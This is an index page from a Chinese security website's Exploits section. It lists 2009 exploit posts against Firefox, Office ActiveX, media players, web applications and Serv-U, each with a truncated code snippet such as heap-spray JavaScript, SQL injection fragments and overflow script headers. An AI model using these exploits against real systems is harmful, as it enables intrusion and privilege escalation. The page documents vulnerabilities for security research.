首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit
  日期:2009-07-20 12:12:26 点击:44 评论:0
#!/usr/bin/env python ####################################################### # # FireFox 3.5 Heap Spray Exploit # Originally discovered by: Simon Berry-Bryne # Pythonized by: David Kennedy (ReL1K) @ SecureState # ###################################
MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit
  日期:2009-07-17 10:30:00 点击:27 评论:0
#!/usr/bin/perl -w # # MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit # # Founded and exploited by prodigy # # Contact: smack_the_stream@hotmail.com # # Vendor: MixSense # # Usage to reproduce the bug: when you created the malici
Easy RM to MP3 Converter 2.7.3.700 (.m3u) Universal BOF Exploit
  日期:2009-07-17 10:29:13 点击:54 评论:0
#!/usr/bin/perl # Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit # Author: Crazy_Hacker # Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe # Tested : Windows XP SP2 (En) # Greetz : Thugz_Hacker,Syrian Ha
MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC
  日期:2009-07-17 10:28:39 点击:23 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC # http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html #######################################################
Hamster Audio Player 0.3a Universal Buffer Overflow Exploit (SEH)
  日期:2009-07-17 10:28:06 点击:12 评论:0
#!/usr/bin/perl #[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH) #[+] Author : ThE g0bL!N #[+] Greetz to all my friends #[+] Tested on: Windows XP Pro SP2 (Fr) ##[+] Big thnx: His0k4 ###################################################
Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulns
  日期:2009-07-17 10:27:09 点击:31 评论:0
#!/usr/bin/perl # # # Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities # # Product web page: http://www.zortam.com # # Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from # two different ma
Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Exploit
  日期:2009-07-17 10:26:18 点击:73 评论:0
#!/usr/bin/perl # # Title: Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability # Product Web Page: http://www.zortam.com # Tested On: Microsoft Windows XP Professional SP3 (English) # # ###===--- # # (1c0.7f8): Integer divide-by-zero
ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)
  日期:2009-07-17 10:24:46 点击:45 评论:0
?php #################################################################### # Zen Photo Adminstrator Password Steal/Reset Exploit # #+================================================================+# # Discovered and coded by petros [at] dusecurity.c
webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit
  日期:2009-07-17 10:23:56 点击:17 评论:0
#!/usr/bin/perl -W # # WebLeague 2.2.0 Remote Admin Bypass p0c # written by ka0x ka0x01[at]gmail.com # # need magic_quotes_gpc = Off # # Vuln code (Admin/index.php) : # # 10:$sql=SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password
Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC
  日期:2009-07-17 10:22:03 点击:47 评论:0
!-- http://en.securitylab.ru/poc/extra/382458.php -- html body script language=JavaScript var shellcode = unescape(evil code); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape(%u0b0c%u0b0C); while(bigblock.lengt
Admin News Tools Remote Contents Change Vulnerability
  日期:2009-07-16 10:41:52 点击:17 评论:0
html !-- Securitylab.ir , info@securitylab.ir -- head /head body center center pbfont size=+2Admin News Toolsi /i/fontfont size=2Remote Contents Change Vulnerability/font/b/p /center form action= http://site.com/news/system/message.php method=post di
Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)
  日期:2009-07-16 10:40:51 点击:28 评论:0
________________________________________________________________________ One bug to rule them all IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. Don't wet your pants - it's DoS only
Infinity <= 2.0.5 Arbitrary Create Admin Exploit
  日期:2009-07-16 10:40:03 点击:59 评论:0
?php print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ__ [q] Infinity = 2.0.5 Create Admin __/QQQ/````````````````QQQ___ _/QQQQQ/ QQQQQQ [q] _POST 3 /QQQQ/`` ```QQQQ /QQQQ/ QQQQ
Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC
  日期:2009-07-16 10:39:02 点击:13 评论:0
------------------------------------------- Firefox 3.5 unicode stack overflow Andrew Haynes , Simon Berry-Byrne ------------------------------------------- html head script language=JavaScript type=Text/Javascript var str = unescape(%u4141%u4141);
Hamster Audio Player 0.3a Local Buffer Overflow PoC
  日期:2009-07-16 10:38:22 点击:22 评论:0
# Hamster Audio Player 0.3a Local BOF PoC my $crash=x41 x 4113 ; open(myfile,'PoC.m3u')#/HPL print myfile $crash; # By ThE g0bL!N #Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html #Note: His0k4 Win Rak :(
Greenwood Content Manager 0.3.2 Local File Inclusion Exploit
  日期:2009-07-16 10:37:15 点击:11 评论:0
#!usr/bin/python ##################################################################################### #### Greenwood Content Manager Remote Code Execution #### ##################################################################################### # #
ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit
  日期:2009-07-16 10:36:20 点击:72 评论:0
/* * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category * * What does this exploit let you do: * The precoded functi
AudioPLUS 2.00.215 (.m3u .lst) Universal SEH Overwrite Exploit
  日期:2009-07-16 10:35:17 点击:27 评论:0
#!/usr/bin/perl # AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit # first exploiter hack4love http://www.milw0rm.com/exploits/9064 # and this the universal for .lst .m3u extention # Big Thnx to his0ka my best freind :d # Stack print A
Icarus 2.0 (.ICP File) Local Buffer Overflow Exploit (SEH)
  日期:2009-07-16 10:34:35 点击:11 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Icarus 2.0 (.ICP File) Local buffer Overflow (seh) # # Greetz to all my friends # form egypt ## easy :d ###PoC by : ThE g0bL!N ## this work sooooooooo good ## USAGE put the file GUEST.ICP in Ic
serv-u 7 local exp 本地溢出提权
  日期:2009-07-15 10:39:07 点击:56 评论:0
? /* serv-u 7 local exp ver 1.0 www.inbreak.net author kxlzx@xiaotou.org 2008-11-19 modify 2008-11-20 */ /* 下面是用到的主要数据包,给大家研究用。如果你用asp等语言再写一次,可以参考。 Global user list: GET /Admin/XML/OrganizationUsers.xmlID=161sync=
共637页/12733条记录 首页 上一页 [438] [439] [440] 441 [442] [443] [444] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved